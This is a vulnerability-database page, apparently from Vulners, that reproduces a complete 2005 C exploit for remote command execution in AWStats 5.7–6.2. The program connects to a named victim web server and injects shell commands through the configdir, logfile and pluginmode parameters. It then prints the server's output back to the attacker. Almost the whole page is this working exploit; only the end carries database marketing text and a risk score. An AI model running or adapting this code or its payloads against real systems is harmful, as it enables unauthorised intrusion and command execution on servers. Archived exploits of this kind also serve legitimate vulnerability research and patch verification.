Vulners
Lucene search
AWStats 5.7 - 6.2 Multiple Remote Exploit
=========================================
AWStats 5.7 - 6.2 Multiple Remote Exploit
=========================================
/****************************************************
* *
* AWStats v5.7 - v6.2 *
* *
* sileAWSxpl *
* This exploit utilize three methods for exploiter *
* the vulnerability found on AWStats software. *
* an user can execute remote code on vulnerable *
* machine, with httpd privileges. *
* *
* References: www.securityfocus.org/bid/12543 *
* *
* coded by: Silentium of Anacron Group Italy *
* date: 24/02/2005 *
* e-mail: anacrongroupitaly[at]autistici[dot]org *
* my_home: www.autistici.org/anacron-group-italy *
* *
* this tool is developed under GPL license *
* no(c) .:. copyleft *
* *
****************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define PORT 80 // port of the web server
#define CMDB 512 // buffer length for commands
#define BUFF 6000 // buffer length for output's commands
#define BANSTART "SILENTIUM"
#define BANSTOP "anacron_group_italy"
void info(void);
void sendxpl(FILE *out, char *argv[], int type);
void readout(int sock, char *argv[]);
void errgeth(void);
void errsock(void);
void errconn(void);
void errsplo(void);
void errbuff(void);
int main(int argc, char *argv[]){
FILE *out;
int sock, sockconn, type;
struct sockaddr_in addr;
struct hostent *hp;
if(argc != 5)
info();
type = atoi(argv[4]);
if(type < 0 || type > 3)
info();
if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
errsock();
system("clear");
printf("[*] Creating socket [OK]\n");
if((hp = gethostbyname(argv[1])) == NULL)
errgeth();
printf("[*] Resolving victim host [OK]\n");
memset(&addr,0,sizeof(addr));
memcpy((char *)&addr.sin_addr,hp->h_addr,hp->h_length);
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);
sockconn = connect(sock, (struct sockaddr *)&addr, sizeof(addr));
if(sockconn < 0)
errconn();
printf("[*] Connecting at victim host [OK]\n",argv[1]);
out = fdopen(sock,"a");
setbuf(out,NULL);
sendxpl(out, argv, type);
printf("[*] Sending exploit [OK]\n");
readout(sock, argv);
shutdown(sock, 2);
close(sock);
fclose(out);
return(0);
}
void info(void){
system("clear");
printf("#########################################\n"
"# AWStats v5.7 - v6.2 #\n"
"# Remote Code Execution #\n"
"# exploit coded by Silentium #\n"
"# Anacron Group Italy #\n"
"# www.autistici.org/anacron-group-italy #\n"
"#########################################\n\n"
"[Usage]\n\n"
" sileAWSxpl <victim> <path_awstats> <cmd> <type>\n\n"
" [Type]\n"
" 1) ?configdir=|cmd|\n"
" 2) ?update=1&logfile=|cmd|\n"
" 3) ?pluginmode=:system(\"cmd\");\n\n"
"[example]\n\n"
" sileAWSxpl www.victim.com /cgi-bin/awstats.pl \"uname -a\" 3\n\n");
exit(1);
}
void sendxpl(FILE *out, char *argv[], int type){
char cmd[CMDB], cmd2[CMDB*3], cc;
char *hex = "0123456789abcdef";
int i, j = 0, size;
size = strlen(argv[3]);
strncpy(cmd,argv[3],size);
/*** Url Encoding Mode ON ***/
for(i = 0; i < size; i++){
cc = cmd[i];
if(cc >= 'a' && cc <= 'z'
|| cc >= 'A' && cc <= 'Z'
|| cc >= '0' && cc <= '9'
|| cc == '-' || cc == '_' || cc == '.')
cmd2[j++] = cc ;
else{
cmd2[j++] = '%';
cmd2[j++] = hex[cc >> 4];
cmd2[j++] = hex[cc & 0x0f];
}
}
cmd2[j] = '\0';
/*** Url Encoding Mode OFF ;P ***/
if(type==1)
fprintf(out,"GET %s?configdir=|echo;echo+%s;%s;echo+%s;echo| HTTP/1.0\n"
"Connection: Keep-Alive\n"
"Accept: text/html, image/jpeg, image/png, text/*, image/*,*/*\n"
"Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n"
"Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n"
"Accept-Language: en\n"
"Host: %s\n\n",argv[2],BANSTART,cmd2,BANSTOP,argv[1]);
else if(type==2)
fprintf(out,"GET %s?update=1&logfile=|echo;echo+%s;%s;echo+%s;echo| HTTP/1.0\n"
"Connection: Keep-Alive\n"
"Accept: text/html, image/jpeg, image/png, text/*, image/*,
*/*\n"
"Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n"
"Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n"
"Accept-Language: en\n"
"Host: %s\n\n",argv[2],BANSTART,cmd2,BANSTOP,argv[1]);
else if(type==3)
fprintf(out,"GET %s?pluginmode=:system(\"echo+%s;%s;echo+%s\"); HTTP/1.0\n"
"Connection: Keep-Alive\n"
"Accept: text/html, image/jpeg, image/png, text/*, image/*,
*/*\n"
"Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n"
"Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n"
"Accept-Language: en\n"
"Host: %s\n\n",argv[2],BANSTART,cmd2,BANSTOP,argv[1]);
}
void readout(int sock, char *argv[]){
int i=0, flag;
char output[BUFF], tmp;
printf("[*] Output by %s:\n\n",argv[1]);
while(strstr(output,BANSTART) == NULL){
flag = read(sock,&tmp,1);
output[i++] = tmp;
if(i >= BUFF)
errbuff();
if(flag==0)
errsplo();
}
while(strstr(output,BANSTOP) == NULL){
read(sock,&tmp,1);
output[i++] = tmp;
putchar(tmp);
if(i >= BUFF)
errbuff();
}
printf("\n\n");
}
void errsock(void){
system("clear");
printf("[x] Creating socket [FAILED]\n\n");
exit(1);
}
void errgeth(void){
printf("[x] Resolving victim host [FAILED]\n\n");
exit(1);
}
void errconn(void){
printf("[x] Connecting at victim host [FAILED]\n\n");
exit(1);
}
void errsplo(void){
printf("[x] Exploiting victim host [FAILED]\n\n");
exit(1);
}
void errbuff(void){
printf("[x] Your buffer for output's command is FULL !!!\n\n");
exit(1);
}
# 0day.today [2018-03-13] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Feb 2005 00:00Current
7.1High risk
Vulners AI Score7.1